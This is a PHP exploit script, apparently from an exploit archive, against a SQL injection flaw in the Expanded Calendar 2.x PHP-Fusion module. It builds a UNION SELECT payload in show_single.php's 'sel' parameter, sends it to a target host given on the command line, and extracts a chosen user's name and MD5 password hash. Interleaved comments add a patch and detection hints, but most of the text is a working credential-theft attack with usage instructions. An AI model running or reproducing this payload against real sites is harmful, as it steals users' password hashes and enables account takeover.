Language: Actionscript
Author: Matrix86
Description: Calendar-V2.00 Php-Fusion mod
Date: 22/09/08 10:39
  1. <?php
  // Advisory banner printed on every run. It names the affected file
  // (show_single.php of the calendar_events_panel infusion) and the author's
  // suggested fix: reject a missing or non-numeric `sel` before it is used.
  echo "
/********************************************************
*      Expanded Calendar 2.x (PHP-Fusion module)        *
*      User pass disclosure exploit                     *
*      Found by Matrix86 of Rbt-4 Crew                  *
*      Site: www.rbt-4.net                              *
*      Mail: info[at]rbt-4[dot]net                      *
*********************************************************
* Bug found in                                          *
*      /infusions/calendar_events_panel/show_single.php *
* Line:                                                 *
*      27                                               *
* Vulnerability type: Sql injection                     *
* Unpatched!                                            *
* Patch:                                                *
* Line 26:                                              *
* if(!isset(\$sel)||!isNum(\$sel)) fallback(\"index.php\"); *
********************************************************/
";

  // Three positional arguments are required: host, install path, user id.
  if ($argc < 4) {
      die("Usage: ".$argv[0]." [site] [path] [user_id]\nExample: ".$argv[0]." localhost /php-fusion/ 1\n");
  }

  // No script time limit; socket operations give up after four seconds.
  ini_set("max_execution_time", 0);
  ini_set("default_socket_timeout", 4);

  // Command-line arguments are used as given, without validation.
  list(, $host, $path, $user_id) = $argv;
  $port = 80;

  // Query string sent to show_single.php. The `sel` parameter carries a UNION
  // SELECT against fusion_users, so the impact is disclosure of the stored
  // user_password and user_name values for one user_id.
  // NOTE(review): the vulnerable query is not shown on this page; per the
  // banner, `sel` reaches it unvalidated. Defensive takeaways: apply the
  // numeric check from the banner (or an integer cast / bound parameter) in
  // show_single.php, and alert on requests to this path whose `sel` value
  // contains SQL keywords or `/**/` comment separators.
  $sqlinit = "infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=";
  $sqlend = "/*";
  34.  
  /**
   * Write a raw request to the target over TCP and return the full reply.
   *
   * Reads the destination from the globals $host and $port. The script is
   * terminated with an error message if the host cannot be resolved or the
   * connection cannot be opened.
   *
   * @param string $req Request text written to the socket as-is.
   * @return string Everything read from the socket until end of stream.
   */
  function send($req)
  {
      global $host, $port;

      // gethostbyname() returns its argument unchanged when resolution fails,
      // which is what this comparison is detecting.
      $address = gethostbyname($host);
      if (stristr($host, $address)) {
          die("Error: Host not found\n");
      }

      $socket = fsockopen($address, $port);
      if ($socket === false) {
          die("Error: unable open sock!\n");
      }

      fwrite($socket, $req);

      // Collect the reply in chunks of at most 127 bytes per read.
      $buffer = "";
      while (feof($socket) === false) {
          $buffer .= fgets($socket, 128);
      }
      fclose($socket);

      return $buffer;
  }
  51.  
  // Assemble a plain HTTP/1.0 GET request. The injected query string ends up
  // in the request line, so it is recorded in ordinary access logs. The
  // User-Agent is a fixed string, so matching on it alone would be a weak
  // detection signal.
  $packet = "GET ".$path.$sqlinit.$user_id.$sqlend." HTTP/1.0\r\n"
      ."User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.7 (like Gecko)\r\n"
      ."Host: ".$host."\r\n"
      ."Connection: Close\r\n\r\n";
  echo "Packet:\n".$packet."\n\n";

  $reply = send($packet);

  // The page renders the selected row into its HTML, so the values are cut out
  // of the markup: the text after the first marker is the password column and
  // the text after the second marker, up to the closing </td>, is the user name.
  $afterTitle = explode("<td colspan='2'><font size='4'><u>", $reply);
  $afterCell = explode("<td colspan='3' style='border-style: solid; border-width: 1px; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px'><font style='font-size: 11px'>", $afterTitle[1]);
  $cellParts = explode("</td>", $afterCell[1]);
  $username = $cellParts[0];

  if (!isset($afterTitle[1])) {
      // NOTE(review): this branch only means the first marker was absent from
      // the reply (an error page or different markup would do that too), so it
      // is not proof that an installation has been patched.
      echo("Bug Fixed..sorry!\n");
  } else {
      // 32 characters is the length of an MD5 hex digest, which is what the
      // script assumes the stored password to be. Any account whose hash is
      // exposed this way should have its password reset.
      $md5 = substr($afterTitle[1], 0, 32);
      echo "Id user:  ".$user_id."\nUsername: ".$username."\nPassword: ".$md5."\n";
  }

  exit();
  71. ?>